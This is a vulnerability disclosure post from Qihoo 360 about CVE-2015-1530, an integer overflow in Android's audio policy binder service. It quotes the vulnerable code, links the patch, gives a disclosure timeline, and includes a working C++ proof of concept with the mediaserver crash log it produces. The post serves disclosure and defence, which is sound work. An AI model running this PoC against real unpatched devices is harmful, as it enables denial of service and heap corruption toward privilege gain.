03月12, 2015

An integer overflow in Android media could be exploited to get media_server permission(CVE-2015-1530)

############################################################################# # # QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/ # ############################################################################# # # CVE ID: CVE-2015-1530 # Product: Android # Vendor: Google # Subject: An integer overflow in Android media could be exploited to get media_server permission # Effect: Gain privileges or cause a denial of service # Author: Guang Gong # Date: March 11th 2015 # ############################################################################# Introduction An Integer overflow in the BnAudioPolicyService::onTransact function in frameworks/av/media/libmedia/IAudioPolicyService.cpp in Android through 5.0 allow attackers to gain privileges or cause a denial of service (memory corruption) via vectors that trigger a large number of count value. Affected Android version all versions below Lollipop 5.1 Patches Android Bug id 18226810 https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160 Description The vulnerable code is as follows. http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661

case QUERY_DEFAULT_PRE_PROCESSING: {
            CHECK_INTERFACE(IAudioPolicyService, data, reply);
            int audioSession = data.readInt32();
            uint32_t count = data.readInt32();
            uint32_t retCount = count;
            effect_descriptor_t *descriptors =
                    (effect_descriptor_t *)new char[count * sizeof(effect_descriptor_t)];//--------------------->count can be set to any value by binder client, which can cause integer overflow and when write to this buffer, heap corruption will happen.
            status_t status = queryDefaultPreProcessing(audioSession, descriptors, &retCount);
            reply->writeInt32(status);
            if (status != NO_ERROR && status != NO_MEMORY) {
                retCount = 0;
            }
            reply->writeInt32(retCount)

Attack vector A normal Apps can corrupt the heap in mediaserver by this vulnerabilities. the PoC of corrupting the heap is as follows

#include      
#include      
#include      
#include      
#include      
#include      
#include      
#include      

using namespace android;    
int main(__attribute__((unused)) int argc, __attribute__((unused)) char* const argv[])    
{    
    sp sm = defaultServiceManager();    
    sp service = sm->checkService(String16("media.audio_policy"));    
    sp iPolicy = IAudioPolicyService::asInterface(service);    
    effect_descriptor_t descriptors;    
    uint32_t count=0xfffffff;    
    iPolicy->getInput((audio_source_t)0,8000,(audio_format_t)1,AUDIO_CHANNEL_IN_FRONT,1);    
    iPolicy->queryDefaultPreProcessing(1,&descriptors,&count);    
    return 0;    
}

the log of corrupt mediaserver is as follows:

--------- beginning of crash
F/libc    (  184): new[] failed to allocate 3221225300 bytes
F/libc    (  184): Fatal signal 6 (SIGABRT), code -6 in tid 654 (Binder_1)
I/DEBUG   (  180): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  180): Build fingerprint: 'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
I/DEBUG   (  180): Revision: '10'
I/DEBUG   (  180): ABI: 'arm'
I/DEBUG   (  180): pid: 184, tid: 654, name: Binder_1  >>> /system/bin/mediaserver <<<
I/DEBUG   (  180): signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
W/NativeCrashListener(  613): Couldn't find ProcessRecord for pid 184
I/DEBUG   (  180): Abort message: 'new[] failed to allocate 3221225300 bytes'
E/DEBUG   (  180): AM write failure (32 / Broken pipe)
I/DEBUG   (  180):     r0 00000000  r1 0000028e  r2 00000006  r3 00000000
I/DEBUG   (  180):     r4 b46ffdb8  r5 00000006  r6 0000000c  r7 0000010c
I/DEBUG   (  180):     r8 0fffffff  r9 000003f5  sl 000000b8  fp 00000001
I/DEBUG   (  180):     ip 0000028e  sp b46ffab8  lr b6f44941  pc b6f6676c  cpsr 60070010
I/DEBUG   (  180): 
I/DEBUG   (  180): backtrace:
I/DEBUG   (  180):     #00 pc 0003576c  /system/lib/libc.so (tgkill+12)
I/DEBUG   (  180):     #01 pc 0001393d  /system/lib/libc.so (pthread_kill+52)
I/DEBUG   (  180):     #02 pc 000143e7  /system/lib/libc.so (raise+10)
I/DEBUG   (  180):     #03 pc 00010e8d  /system/lib/libc.so (__libc_android_abort+36)
I/DEBUG   (  180):     #04 pc 0000f954  /system/lib/libc.so (abort+4)
I/DEBUG   (  180):     #05 pc 00012225  /system/lib/libc.so (__libc_fatal+16)
I/DEBUG   (  180):     #06 pc 000128fd  /system/lib/libc.so (operator new[](unsigned int)+16)
I/DEBUG   (  180):     #07 pc 00056367  /system/lib/libmedia.so (android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+1158)
I/DEBUG   (  180):     #08 pc 000167a5  /system/lib/libbinder.so (android::BBinder::transact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+60)
I/DEBUG   (  180):     #09 pc 0001aea3  /system/lib/libbinder.so (android::IPCThreadState::executeCommand(int)+562)
I/DEBUG   (  180):     #10 pc 0001afbf  /system/lib/libbinder.so (android::IPCThreadState::getAndExecuteCommand()+38)
I/DEBUG   (  180):     #11 pc 0001b001  /system/lib/libbinder.so (android::IPCThreadState::joinThreadPool(bool)+48)
I/DEBUG   (  180):     #12 pc 0001ee93  /system/lib/libbinder.so
I/DEBUG   (  180):     #13 pc 0000e97d  /system/lib/libutils.so (android::Thread::_threadLoop(void*)+112)
I/DEBUG   (  180):     #14 pc 0000e505  /system/lib/libutils.so
I/DEBUG   (  180):     #15 pc 00013133  /system/lib/libc.so (__pthread_start(void*)+30)
I/DEBUG   (  180):     #16 pc 0001120b  /system/lib/libc.so (__start_thread+6)
I/DEBUG   (  180): 
I/DEBUG   (  180): Tombstone written to: /data/tombstones/tombstone_00
I/BootReceiver(  613): Copying /data/tombstones/tombstone_00 to DropBox (SYSTEM_TOMBSTONE)

Milestones

Date Comment Sender
03/11/2014 Initial Report of CVE-2015-1530 Qihoo
08/11/2014 have validated and have created a suitable fix internally Google
11/11/2014 Sent the Android Bug ID 18226810 Google
10/2/2015 Sent the CVE-ID Google
11/3/2015 Lollipop 5.1 was released, disclose it Qihoo

References [1]https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160 [2]http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661

本文链接:http://blogs.360.cn/post/an-integer-overflow-in-android-media-could-be-exploited-to-get-media_server-permission.html

-- EOF --

Comments